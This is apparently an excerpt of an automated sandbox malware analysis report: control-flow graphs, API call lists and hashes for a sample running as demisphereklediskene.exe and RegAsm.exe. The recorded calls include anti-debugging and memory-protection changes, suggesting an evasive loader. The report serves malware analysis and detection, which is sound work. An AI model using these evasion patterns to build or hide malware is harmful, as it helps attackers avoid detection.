                                  control_flow_graph 40 113a38e-113a3b8 41 113a3ba-113a3c2 FindCloseChangeNotification 40->41 42 113a3f9-113a3fe 40->42 44 113a3c8-113a3da 41->44 42->41 45 113a400-113a405 44->45 46 113a3dc-113a3f8 44->46 45->46
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0113A3C0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: b1e500ce6273db27bc4dad71a07d932dcd62cb6ef073223e98408b356583ede6
                                  • Instruction ID: 8f773958c564545825fc1e3d4011cdbd2a6cc1d0c080148c5e8c98b567f23524
                                  • Opcode Fuzzy Hash: b1e500ce6273db27bc4dad71a07d932dcd62cb6ef073223e98408b356583ede6
                                  • Instruction Fuzzy Hash: 750184716042809FDB15CF59E889766FBA4DF84321F08C0ABDD49CB246D7B5A544CA62
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 0113A25E, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 48 113a25e-113a285 49 113a2b0-113a2b5 48->49 50 113a287-113a29a GetConsoleOutputCP 48->50 49->50 51 113a2b7-113a2bc 50->51 52 113a29c-113a2af 50->52 51->52
                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 0113A28D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: 22ed77aa28a0569e2aea4da7dae4b5e1c1d73b2fc4e1d48d4a2ee728a4510369
                                  • Instruction ID: fffcc47284dcdd7e8e19388592abe298bc5690387521b416c3822c0dd559dbfe
                                  • Opcode Fuzzy Hash: 22ed77aa28a0569e2aea4da7dae4b5e1c1d73b2fc4e1d48d4a2ee728a4510369
                                  • Instruction Fuzzy Hash: DEF0C2315047849FDB10CF45E888761FBA4DF85621F08C09ADD498F74AD77AA544CAA2
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Function 050F0710, Relevance: .4, Instructions: 446COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 301 50f0710-50f0776 307 50f077c-50f077f 301->307 308 50f0974-50f09d8 301->308 309 50f0785-50f079a 307->309 310 50f0ab3-50f0b2d 307->310 314 50f079c-50f07b1 309->314 315 50f07b7-50f07d3 309->315 340 50f0c0b-50f0c10 310->340 341 50f0b33-50f0b39 310->341 314->315 322 50f0958-50f0962 314->322 315->310 323 50f07d9-50f07e3 315->323 327 50f096a-50f096e 322->327 323->310 325 50f07e9-50f0802 323->325 330 50f0826-50f083c 325->330 331 50f0804-50f0824 325->331 327->307 327->308 337 50f083f-50f0861 330->337 331->337 342 50f086c-50f0872 337->342 343 50f0863-50f0866 337->343 344 50f0b3f-50f0b76 341->344 345 50f0c11-50f0c44 call 50f0cc8 341->345 347 50f087d-50f0883 342->347 348 50f0874-50f0877 342->348 343->342 346 50f09db-50f0a0a 343->346 374 50f0b78-50f0b7e 344->374 375 50f0bb1-50f0bc2 344->375 365 50f0c46-50f0c49 345->365 366 50f0cc0-50f0cc4 345->366 351 50f0a11-50f0a40 346->351 352 50f0889-50f088c 347->352 353 50f0923-50f0956 347->353 348->347 348->351 363 50f0a47-50f0a76 351->363 352->353 354 50f0892-50f089c 352->354 353->327 357 50f089e-50f08a6 354->357 358 50f0904-50f0920 354->358 362 50f08ac-50f08b2 357->362 357->363 358->353 362->310 368 50f08b8-50f08cd 362->368 384 50f0a7d-50f0aac 363->384 372 50f0c6c-50f0c84 365->372 373 50f0c4b-50f0c6a 365->373 368->384 385 50f08d3-50f08e8 368->385 397 50f0c86-50f0c9f 372->397 373->397 374->345 381 50f0b84-50f0b8f 374->381 394 50f0bc4-50f0bca 375->394 395 50f0bf3-50f0c05 375->395 381->345 386 50f0b95-50f0baf 381->386 384->310 385->384 404 50f08ee-50f08f4 385->404 386->395 394->345 401 50f0bcc-50f0bd7 394->401 395->340 395->341 412 50f0cbb-50f0cbe 397->412 413 50f0ca1-50f0ca8 397->413 401->345 402 50f0bd9-50f0bf1 401->402 402->395 404->310 408 50f08fa-50f0902 404->408 408->353 412->365 412->366 413->412 414 50f0caa-50f0cb3 413->414 414->412
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 061ceef60f6fdc251eb6d622335097e582d77972d28656a5c7e6d1185f16ac30
                                  • Instruction ID: eff4db0d22138909e8479be24e22894fc07b60b80ac22a742720689a1d35fe6d
                                  • Opcode Fuzzy Hash: 061ceef60f6fdc251eb6d622335097e582d77972d28656a5c7e6d1185f16ac30
                                  • Instruction Fuzzy Hash: 3F02A034B002159FCB18EB68D9A4A6EB7F2FFC8304F148569D51A9B356DB71EC41CBA0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F00B9, Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 418 50f00b9-50f010f 427 50f0115 418->427 428 50f01b2-50f01b6 418->428 446 50f0115 call 113a25e 427->446 447 50f0115 call 113a23c 427->447 429 50f011a 430 50f0121-50f0148 429->430 430->428 435 50f014a-50f017d 430->435 435->428 442 50f017f-50f01ab 435->442 442->428 446->429 447->429
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 260b649790fa25de54f7279851ec8a7a7251e2e2dbce899050b6d3e8e9f26f27
                                  • Instruction ID: a240ec30e7ee37e4675be1de272b4cf62be477ea6d64e74dc9e03ae93d9519ca
                                  • Opcode Fuzzy Hash: 260b649790fa25de54f7279851ec8a7a7251e2e2dbce899050b6d3e8e9f26f27
                                  • Instruction Fuzzy Hash: DF213B347042009FCB59AB78D068A6D3BF6AFEA314B2445B9D016CF7A6DE36CC45CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F0DA0, Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 448 50f0da0-50f0da9 460 50f0dab call 50f0d90 448->460 461 50f0dab call 50f0da0 448->461 449 50f0db1-50f0db3 450 50f0dbb-50f0e2e 449->450 451 50f0db5-50f0dba 449->451 459 50f0e33-50f0e35 450->459 460->449 461->449
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44de45788e7632063d160c8574f1baa077aa25bbfdad559145ca81bd6258e503
                                  • Instruction ID: 349d0df34fdbab325ed8c3fa73012d5c3f31a36e2085ea1cd1256a4090e8ce3a
                                  • Opcode Fuzzy Hash: 44de45788e7632063d160c8574f1baa077aa25bbfdad559145ca81bd6258e503
                                  • Instruction Fuzzy Hash: DF014530B102189BC308BBB8E82479D7BA9BFC6620F1480AAD4199B291CE749E05CB95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 029C0648, Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 462 29c0648-29c0649 463 29c05fb-29c0620 462->463 464 29c064b-29c0665 call 29c066a 462->464 468 29c0626-29c0643 463->468
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070737096.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_29c0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc868b93385fc884ba98a1821e80f42acbeb22af54ad6b88a79e8fcc00270adc
                                  • Instruction ID: ceff1bd1737ccdc85dd03a7a790cb37ad0d69f48126fceff50e441a98ce28ebf
                                  • Opcode Fuzzy Hash: bc868b93385fc884ba98a1821e80f42acbeb22af54ad6b88a79e8fcc00270adc
                                  • Instruction Fuzzy Hash: B401F7724097809FC312CF16EC41852BFB8DF86630B1484AFD849CB652D635A808CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 029C05DF, Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 469 29c05df-29c0620 472 29c0626-29c0643 469->472
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070737096.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_29c0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd37379c7bc78e6a7e14ff055c4d78c2e9b4571a2f7da3dceb36a889f09d44e6
                                  • Instruction ID: 44150c6f2c82b12d19725b29e9d14705d65ceb23137fe8cf83269e9e24a2e58e
                                  • Opcode Fuzzy Hash: fd37379c7bc78e6a7e14ff055c4d78c2e9b4571a2f7da3dceb36a889f09d44e6
                                  • Instruction Fuzzy Hash: 5101D6B550D3C46FD7128F16DC40862FFB8DE86530708C4DFEC898B652C125A909CB72
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F0047, Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 473 50f0047-50f006e 474 50f0070-50f007e 473->474 481 50f0081 call 50f00b9 474->481 482 50f0081 call 11323f4 474->482 475 50f0087-50f0091 483 50f0093 call 29c05df 475->483 484 50f0093 call 29c0648 475->484 485 50f0093 call 50f01b7 475->485 486 50f0093 call 29c0606 475->486 476 50f0099-50f009b 477 50f009d-50f00a3 476->477 478 50f00a4-50f00b3 476->478 481->475 482->475 483->476 484->476 485->476 486->476
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 249bbfde6cfb7e5c4ff5fb6221629cfb27952de86bf32bd738db89bdcd3d4091
                                  • Instruction ID: f0cd986636a6e7eded91613463ea41b2137fb28542f3e00827b9b5f49798281d
                                  • Opcode Fuzzy Hash: 249bbfde6cfb7e5c4ff5fb6221629cfb27952de86bf32bd738db89bdcd3d4091
                                  • Instruction Fuzzy Hash: CBF0EC7AA243489FCB15CF61E8945CDBFF9FE45120B0481A7E545C3602FA355641C760
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F0D19, Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 487 50f0d19-50f0d52 495 50f0d54 call 50f0d90 487->495 496 50f0d54 call 50f0da0 487->496 491 50f0d5a-50f0d89 495->491 496->491
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 631f4087f62b42510177545c17fe083cc072c89e9c0dc359326d75b87c0367e6
                                  • Instruction ID: 3aec2bfc35c8d28453c8d892ec51d79d3fbeefede477c5c29676020f9786c12d
                                  • Opcode Fuzzy Hash: 631f4087f62b42510177545c17fe083cc072c89e9c0dc359326d75b87c0367e6
                                  • Instruction Fuzzy Hash: 67F0FA367042242BE70C6779A8146AE6AFAEBD9228F24003AE019CB394DE364C0183A0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F0070, Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 497 50f0070-50f007e 508 50f0081 call 50f00b9 497->508 509 50f0081 call 11323f4 497->509 498 50f0087-50f0091 504 50f0093 call 29c05df 498->504 505 50f0093 call 29c0648 498->505 506 50f0093 call 50f01b7 498->506 507 50f0093 call 29c0606 498->507 499 50f0099-50f009b 500 50f009d-50f00a3 499->500 501 50f00a4-50f00b3 499->501 504->499 505->499 506->499 507->499 508->498 509->498
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34b42d6b9db6138afb0a757910d0d84150208d3b79bc430854d661ba20e703ac
                                  • Instruction ID: afdfe6271e2aea61a233ffbfcf3a3ca7bef4f32fadfb7821d7337333b1572773
                                  • Opcode Fuzzy Hash: 34b42d6b9db6138afb0a757910d0d84150208d3b79bc430854d661ba20e703ac
                                  • Instruction Fuzzy Hash: 4BE0653A714219EF8B18DFA5F4484DEBBE9FA44561B108176E519C3104EA3155808754
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 029C0606, Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 510 29c0606-29c0620 511 29c0626-29c0643 510->511
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070737096.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_29c0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fa29b7b8513ad87b73379592fc27a5e4910fae2be694fc6ca7b3db1c7fab75a
                                  • Instruction ID: f447113be7cbac9e3043215f0e60f6119051efe19fdd75ce17759e2f5e3e9c8b
                                  • Opcode Fuzzy Hash: 1fa29b7b8513ad87b73379592fc27a5e4910fae2be694fc6ca7b3db1c7fab75a
                                  • Instruction Fuzzy Hash: FFE092B66046048BD650DF0AEC81462FBE8EBC4630B18C47FDC0D8B704D575B504CAA1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F0CC8, Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 443dcaf4278bbb9a89c11722a322bde44a1416117a281ecfa0e5d5dec85a9d1f
                                  • Instruction ID: 0a2e6fb3e86d3430bc8fad3107d2e0848b3fd533c86caab74f82cfe0868108cd
                                  • Opcode Fuzzy Hash: 443dcaf4278bbb9a89c11722a322bde44a1416117a281ecfa0e5d5dec85a9d1f
                                  • Instruction Fuzzy Hash: E6E02B39250198DFD710DB74F018FA13BE9BB05620F1040ABD5298322BCB709884C7C0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 050F0D90, Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 812081e65b55e6565c98d49b4076d7e5e7c0563b90c6c5a64eaad000329c9268
                                  • Instruction ID: 72e5579e0b8a9f9b3c032f7c2d1c265f25edfb7afb175fbc47109e68b53a7cf4
                                  • Opcode Fuzzy Hash: 812081e65b55e6565c98d49b4076d7e5e7c0563b90c6c5a64eaad000329c9268
                                  • Instruction Fuzzy Hash: FED0A77960527493CB2497F6B8043DCBF78BB41920F54026ED959C7142FB125A2C83E2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 011323F4, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070116792.0000000001132000.00000040.00000001.sdmp, Offset: 01132000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_1132000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6e427aa1f989c471d884c9f11e852bb017f689268d1dda3d72e503bbc58b3fb
                                  • Instruction ID: d322876316abadef6189c20d57460131dc295c7e14c2d77f44464b2d55263f81
                                  • Opcode Fuzzy Hash: e6e427aa1f989c471d884c9f11e852bb017f689268d1dda3d72e503bbc58b3fb
                                  • Instruction Fuzzy Hash: B2D05E793056818FE31AAE1CC1A9B953FA4AB91B04F5644FAE8008B667C368E681D200
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 011323BC, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070116792.0000000001132000.00000040.00000001.sdmp, Offset: 01132000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_1132000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 275546e01e273bfe2c7d880ee90289591a517e7e25b6ae11e1235ba6fcc1084a
                                  • Instruction ID: 5bd3de1cb91b91396c8134f2f949e7113e737f42ecf90505f36818ec4fc8db1f
                                  • Opcode Fuzzy Hash: 275546e01e273bfe2c7d880ee90289591a517e7e25b6ae11e1235ba6fcc1084a
                                  • Instruction Fuzzy Hash: DED05E352442814BEB19EE0CC1D8F597BD4AB85B04F0644E8BC008B266C3B4D980C600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Analysis Process: demisphereklediskene.exe PID: 1812 Parent PID: 4560 demisphereklediskene.exeCOMMON

                                  Executed Functions

                                  Non-executed Functions

                                  Function 021C0AA2, Relevance: 1.3, Strings: 1, Instructions: 46UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.24230481090.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_21c0000_demisphereklediskene.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: p2#S
                                  • API String ID: 0-559888721
                                  • Opcode ID: b19cc858955087cea543e3bf5139ade1abf38dd807ac0e4cea38e9fcd72fd3b9
                                  • Instruction ID: ee09320729a991d068d46784f6fc47eb26baac0590f5af40159d4671a67d94ef
                                  • Opcode Fuzzy Hash: b19cc858955087cea543e3bf5139ade1abf38dd807ac0e4cea38e9fcd72fd3b9
                                  • Instruction Fuzzy Hash: 140144BA5983A38FD736AB38CD49AD43B20EB01690B604658D5504F2A3E361985BCFE0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 021C0A3F, Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.24230481090.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_21c0000_demisphereklediskene.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57de28597d839a7ba814a9063e1b1ddec0595cef12b05119d96ced5d1b9c9648
                                  • Instruction ID: 6a9ba9ef6124f194d465a45a0cfe2e5a9feb6a7d987247f0a30ff88222f947c2
                                  • Opcode Fuzzy Hash: 57de28597d839a7ba814a9063e1b1ddec0595cef12b05119d96ced5d1b9c9648
                                  • Instruction Fuzzy Hash: BD2168BA9587969FE732CB38CC85BC4BB60EB45340B69468DC0804F283E726944BCA80
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Analysis Process: RegAsm.exe PID: 4328 Parent PID: 1812 RegAsm.exeUNIQUE

                                  Execution Graph

                                  Execution Coverage:7%
                                  Dynamic/Decrypted Code Coverage:3.3%
                                  Signature Coverage:68.4%
                                  Total number of Nodes:583
                                  Total number of Limit Nodes:4

                                  Graph

                                  execution_graph 8523 c32b50 8524 c32f69 TerminateThread 8523->8524 8526 c34bb7 8524->8526 8527 c32b4a 24 API calls 8526->8527 8529 c34bbc 8527->8529 8528 c38fc5 GetPEB 8528->8529 8529->8528 8530 c3a80b 8529->8530 8531 c3a810 8530->8531 8532 c32a91 24 API calls 8530->8532 8532->8531 8533 1d89a7ba 8535 1d89a7ef RegQueryValueExW 8533->8535 8536 1d89a843 8535->8536 7897 c34c66 7902 c34c80 CreateFileA 7897->7902 7899 c34c71 7903 c38799 7899->7903 7901 c38aa5 7902->7899 7904 c387ae GetPEB 7903->7904 7905 c387bc 7904->7905 7905->7901 7906 1d89b32e 7908 1d89b369 LoadLibraryA 7906->7908 7909 1d89b3a6 7908->7909 8537 1d89ba1e 8539 1d89ba44 GetFileSecurityW 8537->8539 8540 1d89ba6b 8539->8540 8541 1d89bade 8543 1d89bb16 CreateMutexW 8541->8543 8544 1d89bb59 8543->8544 8545 1d89a6b2 8548 1d89a6ea RegOpenKeyExW 8545->8548 8547 1d89a740 8548->8547 7910 c393ed 7911 c39402 7910->7911 7912 c381cf 7910->7912 7913 c3822b LoadLibraryA 7912->7913 7914 c38799 GetPEB 7912->7914 7915 c38235 7913->7915 7916 c381ed 7914->7916 7917 c38799 GetPEB 7916->7917 7918 c38219 7916->7918 7919 c38204 7917->7919 7918->7913 7919->7918 7920 c38799 GetPEB 7919->7920 7920->7918 7921 c3a30d 7924 c3a70f 7921->7924 7953 c3062c 7921->7953 7929 c3a7b1 7924->7929 7931 c3a7f4 7924->7931 7924->7953 7926 c30aae NtSetInformationThread 7927 c381cf 2 API calls 7926->7927 7927->7953 7928 c3a7d8 NtQueryInformationProcess 7928->7929 7929->7928 7929->7929 7929->7931 7930 c33189 7934 c3452b 7930->7934 8145 c39eee 7930->8145 7931->7931 7949 c381cf LoadLibraryA GetPEB 7949->7953 7951 c39eee 24 API calls 7951->7953 7952 c38a84 7955 c38799 GetPEB 7952->7955 7953->7930 7953->7949 7953->7951 7953->7952 7957 c310ea 7953->7957 7959 c311bf 7953->7959 7976 c3114f 7953->7976 7988 c3949d 7953->7988 8003 c34c36 7953->8003 8006 c381cf 7953->8006 8016 c34109 GetPEB 7953->8016 8018 c37ce8 7953->8018 8050 c31864 7953->8050 8054 c317bf 7953->8054 7956 c38aa5 7955->7956 7963 c31100 7957->7963 8021 c33189 7957->8021 7961 c311de 7959->7961 7962 c311d1 7959->7962 7965 c31864 GetLongPathNameW 7959->7965 7961->7963 7964 c35a43 7961->7964 7962->7961 8139 c31d3f 7962->8139 7969 c39eee 24 API calls 7963->7969 8147 c311f0 7964->8147 7965->7962 7971 c34107 7969->7971 7970 c35a48 7977 c35a58 7970->7977 8212 c352b9 InternetOpenA 7970->8212 7974 c3949d 4 API calls 7974->7976 7976->7953 7976->7974 8062 c31719 7976->8062 8131 c31dbc 7976->8131 7989 c381cf 2 API calls 7988->7989 7990 c394aa 7989->7990 7991 c381cf 2 API calls 7990->7991 7992 c394c3 GetPEB 7991->7992 8227 c39b4c NtProtectVirtualMemory 7992->8227 7994 c39a53 7994->7953 7997 c39ade 7994->7997 7998 c39a84 7994->7998 7996 c39b44 7996->7953 8230 c39b4c NtProtectVirtualMemory 7997->8230 8229 c39b4c NtProtectVirtualMemory 7998->8229 8000 c39515 8000->7994 8000->8000 8228 c39b4c NtProtectVirtualMemory 8000->8228 8001 c39adb 8001->7953 8004 c381cf 2 API calls 8003->8004 8005 c34c43 8004->8005 8005->7953 8007 c381e1 8006->8007 8008 c3822b LoadLibraryA 8006->8008 8009 c38799 GetPEB 8007->8009 8010 c38235 8008->8010 8011 c381ed 8009->8011 8010->7926 8012 c38219 8011->8012 8013 c38799 GetPEB 8011->8013 8012->8008 8014 c38204 8013->8014 8014->8012 8015 c38799 GetPEB 8014->8015 8015->8012 8017 c34517 8016->8017 8017->7953 8231 c381b7 GetPEB 8018->8231 8020 c37ced 8022 c331e1 8021->8022 8023 c39eee 24 API calls 8022->8023 8024 c3452b 8022->8024 8029 c33601 8023->8029 8024->7957 8025 c33df6 8026 c39eee 24 API calls 8025->8026 8027 c33e07 8026->8027 8028 c39eee 24 API calls 8027->8028 8030 c33e15 8028->8030 8029->8025 8033 c39eee 24 API calls 8029->8033 8031 c39eee 24 API calls 8030->8031 8032 c33e2d 8031->8032 8035 c39eee 24 API calls 8032->8035 8034 c33723 8033->8034 8034->8025 8037 c39eee 24 API calls 8034->8037 8036 c33e48 8035->8036 8036->7957 8038 c33761 8037->8038 8038->8025 8039 c39eee 24 API calls 8038->8039 8040 c337c7 8039->8040 8040->8025 8041 c39eee 24 API calls 8040->8041 8042 c33952 8041->8042 8042->8025 8043 c39eee 24 API calls 8042->8043 8044 c33d94 8043->8044 8044->8025 8045 c33d9b 8044->8045 8046 c39eee 24 API calls 8045->8046 8047 c33db6 8046->8047 8048 c39eee 24 API calls 8047->8048 8049 c33dce 8048->8049 8049->7957 8051 c36913 8050->8051 8232 c3186b 8051->8232 8053 c36918 8053->7953 8055 c368d3 8054->8055 8241 c317ce RegCreateKeyExA 8055->8241 8057 c368d8 8058 c36918 8057->8058 8251 c31d5a 8057->8251 8058->7953 8061 c3186b GetLongPathNameW 8061->8058 8063 c39eee 23 API calls 8062->8063 8064 c31740 8063->8064 8065 c39eee 23 API calls 8064->8065 8066 c3175f 8065->8066 8067 c31775 8066->8067 8074 c3062c 8066->8074 8068 c39eee 23 API calls 8067->8068 8070 c317a7 8068->8070 8069 c381cf LoadLibraryA GetPEB 8069->8074 8071 c39eee 23 API calls 8070->8071 8109 c31100 8071->8109 8072 c39eee 23 API calls 8073 c34107 8072->8073 8073->7976 8074->8069 8075 c34c36 2 API calls 8074->8075 8076 c381cf 2 API calls 8074->8076 8079 c33189 8074->8079 8081 c34109 GetPEB 8074->8081 8098 c39eee 23 API calls 8074->8098 8099 c38a84 8074->8099 8100 c37ce8 GetPEB 8074->8100 8103 c310ea 8074->8103 8105 c311bf 8074->8105 8106 c31864 GetLongPathNameW 8074->8106 8114 c317bf 23 API calls 8074->8114 8118 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8074->8118 8119 c31719 23 API calls 8074->8119 8121 c31dbc 23 API calls 8074->8121 8075->8074 8077 c30aae NtSetInformationThread 8076->8077 8078 c381cf 2 API calls 8077->8078 8078->8074 8080 c39eee 23 API calls 8079->8080 8082 c3452b 8079->8082 8087 c33601 8080->8087 8081->8074 8082->7976 8083 c33df6 8084 c39eee 23 API calls 8083->8084 8085 c33e07 8084->8085 8086 c39eee 23 API calls 8085->8086 8088 c33e15 8086->8088 8087->8083 8091 c39eee 23 API calls 8087->8091 8089 c39eee 23 API calls 8088->8089 8090 c33e2d 8089->8090 8093 c39eee 23 API calls 8090->8093 8092 c33723 8091->8092 8092->8083 8095 c39eee 23 API calls 8092->8095 8094 c33e48 8093->8094 8094->7976 8096 c33761 8095->8096 8096->8083 8097 c39eee 23 API calls 8096->8097 8116 c337c7 8097->8116 8098->8074 8101 c38799 GetPEB 8099->8101 8100->8074 8102 c38aa5 8101->8102 8102->7976 8104 c33189 23 API calls 8103->8104 8103->8109 8104->8103 8107 c311de 8105->8107 8108 c311d1 8105->8108 8111 c31864 GetLongPathNameW 8105->8111 8106->8074 8107->8109 8110 c35a43 8107->8110 8108->8107 8112 c31d3f 23 API calls 8108->8112 8109->7976 8109->8072 8113 c311f0 23 API calls 8110->8113 8111->8108 8112->8107 8115 c35a48 8113->8115 8114->8074 8117 c352b9 23 API calls 8115->8117 8120 c35a58 8115->8120 8116->8083 8122 c39eee 23 API calls 8116->8122 8117->8120 8118->8074 8119->8074 8121->8074 8123 c33952 8122->8123 8123->8083 8124 c39eee 23 API calls 8123->8124 8125 c33d94 8124->8125 8125->8083 8126 c33d9b 8125->8126 8127 c39eee 23 API calls 8126->8127 8128 c33db6 8127->8128 8129 c39eee 23 API calls 8128->8129 8130 c33dce 8129->8130 